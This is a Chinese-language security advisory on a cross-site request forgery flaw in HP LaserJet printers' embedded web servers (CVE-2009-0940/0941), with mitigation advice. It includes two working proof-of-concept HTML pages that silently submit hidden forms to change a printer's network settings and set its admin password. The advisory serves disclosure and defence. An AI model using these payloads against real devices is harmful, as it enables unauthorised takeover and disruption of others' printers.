安全研究

安全漏洞
HP LaserJet打印机跨站请求伪造漏洞

发布日期:2009-03-17
更新日期:2009-03-18

受影响系统:
HP color LaserJet 2605dtn
HP LaserJet M1522n MFP
描述:
BUGTRAQ  ID: 34143
CVE(CAN) ID: CVE-2009-0940,CVE-2009-0941

HP LaserJet是HP推出的激光打印机系列。

LaserJet系列激光打印机所内嵌的WEB服务器默认下接受TCP 9100端口上所发送的打印请求。如果用户受骗访问了包含有恶意代码的网站的话,就可能导致跨站请求伪造攻击,非授权更改打印机网络配置或用户口令。

<*来源:Henri Lindberg (henri.lindberg@louhi.fi
  
  链接:http://marc.info/?l=bugtraq&m=123730844032146&w=2
        http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566&printver=true
        http://secunia.com/advisories/34343/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head><title>Network</title></head>
<body onload="document.CSRF.submit();">
<FORM name="CSRF" method="post"  
ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config";  
style="display:none">
<input name="Clear" value="Yes">
<input name="Menu" value="NetIPChange">
<input name="Configuration"  
value="IPConfig=Man&amp;IPAddr=1.1.1.1&amp;SN=2.2.2.2&amp;GW=3.3.3.3&amp;WINS=0.0.0.0">
</form>
</body>
</html>

无效的Configuration参数值将IP、掩码和网关设置为255.255.255.255。

<html>
<head><title>Set password</title></head>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" method="post"  
ACTION="http://1.2.3.4/hp/device/set_config_password.html/config";  
style="display:none">
   <INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil">
   <INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil">
   <INPUT type="hidden" VALUE="System">
</FORM>
</body>
<html>

建议:
临时解决方法:

* 为HP Embedded Web Server设置安全的口令。
* 设置PJL口令。
* 在外部文件系统访问配置中,禁止PJL和PostScript磁盘访问。

厂商补丁:

HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://itrc.hp.com

浏览次数:2687
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障